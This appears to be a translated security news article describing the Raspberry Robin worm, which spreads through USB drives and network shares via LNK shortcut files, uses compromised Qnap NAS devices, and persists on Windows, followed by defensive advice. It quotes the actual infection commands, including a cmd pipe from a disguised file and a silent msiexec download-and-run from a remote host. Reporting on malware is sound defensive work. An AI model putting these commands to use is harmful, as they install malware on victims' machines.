Cybereason IT researchers have discovered a network worm spreading on Windows and Qnap devices. They call the campaign Raspberry Robin.
Researchers from IT -Security company Cybereason has discovered a malware campaign involving a computer worm affecting Windows and Qnap network storage devices. It is part of the malware campaign called Raspberry Robin, but the malware is also known as LNK Worm.
Raspberry Robin is a worm that spreads using USB devices or network shares. He uses compromised Qnap NAS devices as a springboard. The old but still effective method of lurking for victims with LNK shortcut files is used.
The Raspberry Robin infection starts with two files, the located in the same directory on an external device or network share: An .lnk file that contains a Windows command and a file that works as a .bat file that consists of padding data and two special commands.
In the specific example, the .lnk file contains the call C:WindowsSystem32cmd.exe” /r tYPE xPhfK.Usb|CmD, while the xPhfK.Usb file contains two commands explorer.exe ADATA uFD and mSIExEC /Q -I”hTTP ://<address>:8080/<directory>/USER-PC?admin” to download and run the malware.
The msiexec installer already installed on the computer (so-called “Living of the Land”, LOL) is designed to download a malicious DLL library from a compromised Qnap NAS device and a to execute. To make detection more difficult, Raspberry Robin uses process injection into three legitimate Windows processes and communicates with the command and control servers through the anonymizing Tor network.
The malware achieves persistence through creation a registry key that loads and executes the DLL file using rundll32.exe at system startup. In the case examined, the library imitates an Apache DLL called libapriconv-1.dll in order not to arouse suspicion. According to Cybereason, other infections also use a disguise as QT 5.
Countermeasures against Raspberry Robin
Anti-virus software can be used to protect against malware infestation. Cybereason provides further information on how to prevent an infestation or what to do after an infestation. IT managers should block outgoing connections to Tor-related addresses, since Raspberry Robin actively communicates with Tor exit nodes.
If an infection does occur, the affected machines should be rebooted with an image , as the malware nests and uses hiding mechanisms on infected systems. See Cybereason’s announcement for more details.